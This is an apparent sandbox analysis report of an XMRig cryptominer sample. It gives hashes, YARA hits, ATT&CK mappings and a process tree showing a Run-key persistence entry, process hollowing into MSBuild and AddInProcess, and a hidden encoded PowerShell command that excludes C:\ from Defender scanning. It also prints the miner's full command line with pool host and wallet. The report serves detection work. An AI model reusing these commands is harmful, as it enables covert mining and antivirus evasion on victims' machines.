xmrig | b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2

Analysis

max time kernel
306s
max time network
306s
platform
windows10-1703_x64
resource
win10-20230915-en
resource tags

arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system
submitted
08/10/2023, 22:25

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe
Size

202KB
MD5

0d4319ab251ef7326d331fde039c5440
SHA1

982d2c249bcccdfda4faa1a4c6b5a974d0948156
SHA256

b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2
SHA512

42c65d195fe3656b8f2a45117cc97b36674d18fad5d94b688d88f44d5fbc3f3ce724116080e9841491a853aa38655eb7145756daac9daec8734bd6f5b6ad8ae5
SSDEEP

3072:vbcmK0rkRsxd/jPvlpc3KTmfhQYH9Rh+/Gfclo5c5d:vImiyd/rU3KTmZF9j+/G

Score

10^/10

xmrig miner persistence

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 11 IoCs

miner

resource	yara_rule
behavioral2/memory/1108-103-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/1108-104-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/1108-105-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/1108-109-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/1108-110-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/1108-111-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/1108-112-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/1108-113-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/1108-115-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/1108-116-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral2/memory/1108-117-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig

Executes dropped EXE 2 IoCs

pid	Process
4612	IsInvalid.exe
4400	IsInvalid.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Windows\CurrentVersion\Run\asdafa = "C:\\Users\\Admin\\AppData\\Roaming\\asdafa.exe"	b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Windows\CurrentVersion\Run\asdafa = "C:\\Users\\Admin\\AppData\\Roaming\\asdafa.exe"	IsInvalid.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 3008 set thread context of 4476	3008	b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe	76
PID 4612 set thread context of 4400	4612	IsInvalid.exe	88
PID 4400 set thread context of 832	4400	IsInvalid.exe	89
PID 832 set thread context of 2088	832	MSBuild.exe	96
PID 2088 set thread context of 1108	2088	MSBuild.exe	98

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Gathers network information 2 TTPs 6 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4404	ipconfig.exe
2112	ipconfig.exe
424	ipconfig.exe
1052	ipconfig.exe
3120	ipconfig.exe
604	ipconfig.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
208	powershell.exe
208	powershell.exe
208	powershell.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe
2088	MSBuild.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
620	Process not Found

Suspicious use of AdjustPrivilegeToken 30 IoCs

description	pid	Process
Token: SeDebugPrivilege	3008	b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe
Token: SeDebugPrivilege	4476	b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe
Token: SeDebugPrivilege	208	powershell.exe
Token: SeIncreaseQuotaPrivilege	208	powershell.exe
Token: SeSecurityPrivilege	208	powershell.exe
Token: SeTakeOwnershipPrivilege	208	powershell.exe
Token: SeLoadDriverPrivilege	208	powershell.exe
Token: SeSystemProfilePrivilege	208	powershell.exe
Token: SeSystemtimePrivilege	208	powershell.exe
Token: SeProfSingleProcessPrivilege	208	powershell.exe
Token: SeIncBasePriorityPrivilege	208	powershell.exe
Token: SeCreatePagefilePrivilege	208	powershell.exe
Token: SeBackupPrivilege	208	powershell.exe
Token: SeRestorePrivilege	208	powershell.exe
Token: SeShutdownPrivilege	208	powershell.exe
Token: SeDebugPrivilege	208	powershell.exe
Token: SeSystemEnvironmentPrivilege	208	powershell.exe
Token: SeRemoteShutdownPrivilege	208	powershell.exe
Token: SeUndockPrivilege	208	powershell.exe
Token: SeManageVolumePrivilege	208	powershell.exe
Token: 33	208	powershell.exe
Token: 34	208	powershell.exe
Token: 35	208	powershell.exe
Token: 36	208	powershell.exe
Token: SeDebugPrivilege	4612	IsInvalid.exe
Token: SeDebugPrivilege	4400	IsInvalid.exe
Token: SeDebugPrivilege	832	MSBuild.exe
Token: SeDebugPrivilege	2088	MSBuild.exe
Token: SeLockMemoryPrivilege	1108	AddInProcess.exe
Token: SeLockMemoryPrivilege	1108	AddInProcess.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1108	AddInProcess.exe

Suspicious use of WriteProcessMemory 63 IoCs

description	pid	Process	procid_target
PID 3008 wrote to memory of 4196	3008	b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe	70
PID 3008 wrote to memory of 4196	3008	b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe	70
PID 4196 wrote to memory of 3120	4196	cmd.exe	72
PID 4196 wrote to memory of 3120	4196	cmd.exe	72
PID 3008 wrote to memory of 4316	3008	b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe	73
PID 3008 wrote to memory of 4316	3008	b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe	73
PID 4316 wrote to memory of 604	4316	cmd.exe	75
PID 4316 wrote to memory of 604	4316	cmd.exe	75
PID 3008 wrote to memory of 4476	3008	b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe	76
PID 3008 wrote to memory of 4476	3008	b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe	76
PID 3008 wrote to memory of 4476	3008	b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe	76
PID 3008 wrote to memory of 4476	3008	b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe	76
PID 3008 wrote to memory of 4476	3008	b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe	76
PID 3008 wrote to memory of 4476	3008	b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe	76
PID 4612 wrote to memory of 3600	4612	IsInvalid.exe	82
PID 4612 wrote to memory of 3600	4612	IsInvalid.exe	82
PID 3600 wrote to memory of 4404	3600	cmd.exe	84
PID 3600 wrote to memory of 4404	3600	cmd.exe	84
PID 4612 wrote to memory of 1008	4612	IsInvalid.exe	85
PID 4612 wrote to memory of 1008	4612	IsInvalid.exe	85
PID 1008 wrote to memory of 2112	1008	cmd.exe	87
PID 1008 wrote to memory of 2112	1008	cmd.exe	87
PID 4612 wrote to memory of 4400	4612	IsInvalid.exe	88
PID 4612 wrote to memory of 4400	4612	IsInvalid.exe	88
PID 4612 wrote to memory of 4400	4612	IsInvalid.exe	88
PID 4612 wrote to memory of 4400	4612	IsInvalid.exe	88
PID 4612 wrote to memory of 4400	4612	IsInvalid.exe	88
PID 4612 wrote to memory of 4400	4612	IsInvalid.exe	88
PID 4400 wrote to memory of 832	4400	IsInvalid.exe	89
PID 4400 wrote to memory of 832	4400	IsInvalid.exe	89
PID 4400 wrote to memory of 832	4400	IsInvalid.exe	89
PID 4400 wrote to memory of 832	4400	IsInvalid.exe	89
PID 4400 wrote to memory of 832	4400	IsInvalid.exe	89
PID 4400 wrote to memory of 832	4400	IsInvalid.exe	89
PID 4400 wrote to memory of 832	4400	IsInvalid.exe	89
PID 832 wrote to memory of 4752	832	MSBuild.exe	90
PID 832 wrote to memory of 4752	832	MSBuild.exe	90
PID 4752 wrote to memory of 424	4752	cmd.exe	92
PID 4752 wrote to memory of 424	4752	cmd.exe	92
PID 832 wrote to memory of 2568	832	MSBuild.exe	93
PID 832 wrote to memory of 2568	832	MSBuild.exe	93
PID 2568 wrote to memory of 1052	2568	cmd.exe	95
PID 2568 wrote to memory of 1052	2568	cmd.exe	95
PID 832 wrote to memory of 2088	832	MSBuild.exe	96
PID 832 wrote to memory of 2088	832	MSBuild.exe	96
PID 832 wrote to memory of 2088	832	MSBuild.exe	96
PID 832 wrote to memory of 2088	832	MSBuild.exe	96
PID 832 wrote to memory of 2088	832	MSBuild.exe	96
PID 832 wrote to memory of 2088	832	MSBuild.exe	96
PID 2088 wrote to memory of 1108	2088	MSBuild.exe	98
PID 2088 wrote to memory of 1108	2088	MSBuild.exe	98
PID 2088 wrote to memory of 1108	2088	MSBuild.exe	98
PID 2088 wrote to memory of 1108	2088	MSBuild.exe	98
PID 2088 wrote to memory of 1108	2088	MSBuild.exe	98
PID 2088 wrote to memory of 1108	2088	MSBuild.exe	98
PID 2088 wrote to memory of 1108	2088	MSBuild.exe	98
PID 2088 wrote to memory of 1108	2088	MSBuild.exe	98
PID 2088 wrote to memory of 1108	2088	MSBuild.exe	98
PID 2088 wrote to memory of 1108	2088	MSBuild.exe	98
PID 2088 wrote to memory of 1108	2088	MSBuild.exe	98
PID 2088 wrote to memory of 1108	2088	MSBuild.exe	98
PID 2088 wrote to memory of 1108	2088	MSBuild.exe	98
PID 2088 wrote to memory of 1108	2088	MSBuild.exe	98

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe
"C:\Users\Admin\AppData\Local\Temp\b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe"
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3008
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ipconfig /release
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4196
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:3120
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ipconfig /renew
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4316
- - C:\Windows\system32\ipconfig.exe
    ipconfig /renew
    3⤵
    - Gathers network information
    PID:604
- C:\Users\Admin\AppData\Local\Temp\b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe
  C:\Users\Admin\AppData\Local\Temp\b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208

C:\Users\Admin\AppData\Roaming\MergeLogic\IsInvalid.exe
C:\Users\Admin\AppData\Roaming\MergeLogic\IsInvalid.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4612
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ipconfig /release
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3600
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:4404
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ipconfig /renew
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1008
- - C:\Windows\system32\ipconfig.exe
    ipconfig /renew
    3⤵
    - Gathers network information
    PID:2112
- C:\Users\Admin\AppData\Roaming\MergeLogic\IsInvalid.exe
  C:\Users\Admin\AppData\Roaming\MergeLogic\IsInvalid.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4400
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:832
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ipconfig /release
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4752
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:424
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ipconfig /renew
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2568
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /renew
        5⤵
        Gathers network information
        
        PID:1052
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      4⤵
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2088
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 44hkbozfzb2j1HuG4ZUrYTXbgE4omN34ffTsZjsG2NUs3iwLtMATrei19gDroXxnn8MBLxYV8LdHNQNeDArSYfS55EgagMA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
        5⤵
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:1108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\IsInvalid.exe.log

Filesize
1KB

MD5
ad4d5f6fc68efa239f4636381bdc8dfb

SHA1
6102ea8c5ffcb473dd6846792fe11a0f34b60b03

SHA256
1c4b0505dac9d528e2db53653e5b1c98a38edfad1792f61fab9cfc4b5b6dce72

SHA512
85ad0d1bcb7e4ccb4fcc2232d8f8a39bf04a1d85e5a39382486b978ebb31b84325bca560cc591e04f13e60f5a92465f1f604429b4dcab69c59d65014c910aa6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MSBuild.exe.log

Filesize
1KB

MD5
ad4d5f6fc68efa239f4636381bdc8dfb

SHA1
6102ea8c5ffcb473dd6846792fe11a0f34b60b03

SHA256
1c4b0505dac9d528e2db53653e5b1c98a38edfad1792f61fab9cfc4b5b6dce72

SHA512
85ad0d1bcb7e4ccb4fcc2232d8f8a39bf04a1d85e5a39382486b978ebb31b84325bca560cc591e04f13e60f5a92465f1f604429b4dcab69c59d65014c910aa6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2.exe.log

Filesize
1KB

MD5
ad4d5f6fc68efa239f4636381bdc8dfb

SHA1
6102ea8c5ffcb473dd6846792fe11a0f34b60b03

SHA256
1c4b0505dac9d528e2db53653e5b1c98a38edfad1792f61fab9cfc4b5b6dce72

SHA512
85ad0d1bcb7e4ccb4fcc2232d8f8a39bf04a1d85e5a39382486b978ebb31b84325bca560cc591e04f13e60f5a92465f1f604429b4dcab69c59d65014c910aa6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xsf12px.lum.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\MergeLogic\IsInvalid.exe

Filesize
202KB

MD5
0d4319ab251ef7326d331fde039c5440

SHA1
982d2c249bcccdfda4faa1a4c6b5a974d0948156

SHA256
b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2

SHA512
42c65d195fe3656b8f2a45117cc97b36674d18fad5d94b688d88f44d5fbc3f3ce724116080e9841491a853aa38655eb7145756daac9daec8734bd6f5b6ad8ae5

Download Submit
C:\Users\Admin\AppData\Roaming\MergeLogic\IsInvalid.exe

Filesize
202KB

MD5
0d4319ab251ef7326d331fde039c5440

SHA1
982d2c249bcccdfda4faa1a4c6b5a974d0948156

SHA256
b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2

SHA512
42c65d195fe3656b8f2a45117cc97b36674d18fad5d94b688d88f44d5fbc3f3ce724116080e9841491a853aa38655eb7145756daac9daec8734bd6f5b6ad8ae5

Download Submit
C:\Users\Admin\AppData\Roaming\MergeLogic\IsInvalid.exe

Filesize
202KB

MD5
0d4319ab251ef7326d331fde039c5440

SHA1
982d2c249bcccdfda4faa1a4c6b5a974d0948156

SHA256
b9e034f81cca628a7bc2dd4dc341a2014437fa79a6f6834e0774e773dfb09bc2

SHA512
42c65d195fe3656b8f2a45117cc97b36674d18fad5d94b688d88f44d5fbc3f3ce724116080e9841491a853aa38655eb7145756daac9daec8734bd6f5b6ad8ae5

Download Submit
memory/208-24-0x0000025451A80000-0x0000025451A90000-memory.dmp

Filesize
64KB

Download
memory/208-28-0x0000025451D10000-0x0000025451D86000-memory.dmp

Filesize
472KB

Download
memory/208-67-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/208-63-0x0000025451A80000-0x0000025451A90000-memory.dmp

Filesize
64KB

Download
memory/208-22-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/208-42-0x0000025451A80000-0x0000025451A90000-memory.dmp

Filesize
64KB

Download
memory/208-23-0x0000025451A80000-0x0000025451A90000-memory.dmp

Filesize
64KB

Download
memory/208-25-0x0000025451A30000-0x0000025451A52000-memory.dmp

Filesize
136KB

Download
memory/832-90-0x0000020F9E670000-0x0000020F9E680000-memory.dmp

Filesize
64KB

Download
memory/832-91-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/832-92-0x0000020F9E670000-0x0000020F9E680000-memory.dmp

Filesize
64KB

Download
memory/832-98-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/832-88-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/1108-114-0x0000024A9DD80000-0x0000024A9DDC0000-memory.dmp

Filesize
256KB

Download
memory/1108-107-0x0000024A9DC30000-0x0000024A9DC50000-memory.dmp

Filesize
128KB

Download
memory/1108-110-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/1108-112-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/1108-113-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/1108-115-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/1108-109-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/1108-111-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/1108-105-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/1108-104-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/1108-103-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/1108-116-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/1108-117-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/1108-118-0x0000024A9DDC0000-0x0000024A9DDE0000-memory.dmp

Filesize
128KB

Download
memory/1108-119-0x0000024A9DDC0000-0x0000024A9DDE0000-memory.dmp

Filesize
128KB

Download
memory/2088-101-0x000001B729460000-0x000001B729470000-memory.dmp

Filesize
64KB

Download
memory/2088-106-0x000001B729460000-0x000001B729470000-memory.dmp

Filesize
64KB

Download
memory/2088-100-0x000001B729460000-0x000001B729470000-memory.dmp

Filesize
64KB

Download
memory/2088-99-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/2088-96-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/2088-102-0x000001B729460000-0x000001B729470000-memory.dmp

Filesize
64KB

Download
memory/2088-97-0x000001B729460000-0x000001B729470000-memory.dmp

Filesize
64KB

Download
memory/2088-108-0x000001B729460000-0x000001B729470000-memory.dmp

Filesize
64KB

Download
memory/3008-0-0x000001F8A9970000-0x000001F8A99A8000-memory.dmp

Filesize
224KB

Download
memory/3008-3-0x000001F8AB5F0000-0x000001F8AB6C8000-memory.dmp

Filesize
864KB

Download
memory/3008-5-0x000001F8C4340000-0x000001F8C438C000-memory.dmp

Filesize
304KB

Download
memory/3008-1-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/3008-2-0x000001F8AB6E0000-0x000001F8AB6F0000-memory.dmp

Filesize
64KB

Download
memory/3008-6-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/3008-4-0x000001F8C4200000-0x000001F8C42C6000-memory.dmp

Filesize
792KB

Download
memory/3008-13-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/3008-7-0x000001F8AB6E0000-0x000001F8AB6F0000-memory.dmp

Filesize
64KB

Download
memory/4400-83-0x0000026A6DA40000-0x0000026A6DA50000-memory.dmp

Filesize
64KB

Download
memory/4400-89-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/4400-87-0x0000026A6DA40000-0x0000026A6DA50000-memory.dmp

Filesize
64KB

Download
memory/4400-84-0x0000026A6D160000-0x0000026A6D1B4000-memory.dmp

Filesize
336KB

Download
memory/4400-82-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/4400-86-0x0000026A6DA40000-0x0000026A6DA50000-memory.dmp

Filesize
64KB

Download
memory/4476-41-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/4476-70-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/4476-17-0x0000026FB2C80000-0x0000026FB2CD4000-memory.dmp

Filesize
336KB

Download
memory/4476-16-0x0000026FB1250000-0x0000026FB12A6000-memory.dmp

Filesize
344KB

Download
memory/4476-15-0x0000026FCB4B0000-0x0000026FCB4C0000-memory.dmp

Filesize
64KB

Download
memory/4476-14-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/4476-12-0x0000026FCB4C0000-0x0000026FCB5C0000-memory.dmp

Filesize
1024KB

Download
memory/4476-9-0x0000000140000000-0x00000001400A2000-memory.dmp

Filesize
648KB

Download
memory/4612-76-0x000001ADF4090000-0x000001ADF40A0000-memory.dmp

Filesize
64KB

Download
memory/4612-75-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/4612-81-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/4612-73-0x00007FFE0E120000-0x00007FFE0EB0C000-memory.dmp

Filesize
9.9MB

Download
memory/4612-74-0x000001ADF4090000-0x000001ADF40A0000-memory.dmp

Filesize
64KB

Download